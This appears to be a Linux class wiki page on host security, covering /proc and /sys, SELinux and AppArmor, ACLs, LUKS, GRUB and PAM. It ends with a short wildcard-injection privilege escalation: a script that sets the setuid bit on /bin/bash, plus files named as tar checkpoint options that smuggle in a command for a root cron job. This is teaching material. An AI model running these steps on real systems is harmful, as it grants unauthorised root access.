Lesson 07 - chad-p/wiki-linux-class GitHub Wiki
Host Security
Live OS
Partitions
Commands:
df -ahT
fdisk -l
man proc
Modern Linux distributions include a /sys
directory as a virtual filesystem (sysfs, comparable to /proc
, which is a procfs), which stores and allows modification of the devices connected to the system, whereas many traditional UNIX and Unix-like operating systems use /sys
as a symbolic link to the kernel source tree.
sysfs is a ram-based filesystem, it provides a means to export kernel data structures, their attributes, and the linkages between them to userspace.
Proc
- /proc/cpuinfo : CPU Information
- /proc/filesystems : File-system Information being used currently.
- /proc/interrupts : Information about the current interrupts being utilised currently.
- /proc/ioports : Contains all the Input/Output addresses used by devices on the server.
- /proc/meminfo : Memory Usages Information.
- /proc/modules : Currently using kernel module.
- /proc/mount : Mounted File-system Information.
- /proc/stat : Detailed Statistics of the current System.
- /proc/swaps : Swap File Information.
Mandatory Access Control (MAC)
Discretionary Access Control (DAC) - With DAC, files and processes have owners. You can have the user own a file, a group own a file, or other, which can be anyone else. Users have the ability to change permissions on their own files.
But on MAC systems like SELinux, there is administratively set policy around access. Even if the DAC settings on your home directory are changed, an SELinux policy in place to prevent another user or process from accessing the directory will keep the system safe.
- SELinux = Redhat Based
- AppArmor = Ubuntu, Debian, Suse
SELINUX
- https://www.redhat.com/en/topics/linux/what-is-selinux
- https://github.com/SELinuxProject/selinux-notebook
- https://www.thegeekdiary.com/understanding-selinux-policies-in-linux/
AppArmor
ACL
getfacl
setfacl
setfacl -m g:students:rwx file
Encryption
LUKS
GRUB
- https://www.systranbox.com/what-is-grub-and-why-is-it-important/
- https://www.tecmint.com/password-protect-grub-in-linux/
- https://www.tecmint.com/reset-forgotten-root-password-in-debian/
PAM
- https://www.redhat.com/sysadmin/pluggable-authentication-modules-pam
- https://cyber.vumetric.com/vulns/linux-pam/linux-pam/
- https://www.tecmint.com/configure-pam-in-centos-ubuntu-linux/
- https://tldp.org/HOWTO/User-Authentication-HOWTO/x115.html
- https://www.techradar.com/how-to/how-to-add-two-factor-authentication-to-linux-with-google-authenticator
Wildcard Exploit
- https://www.davila.me/menu/vulnerability-methods/wildcard-injection
- https://betterprogramming.pub/becoming-root-with-wildcard-injections-on-linux-2dc94032abeb
echo "chmod +s /bin/bash" > exploit.sh
touch ./"--checkpoint=1"
touch ./"--checkpoint-action=exec=bash exploit.sh"
# remove comment in root crontab
bash -p
whoami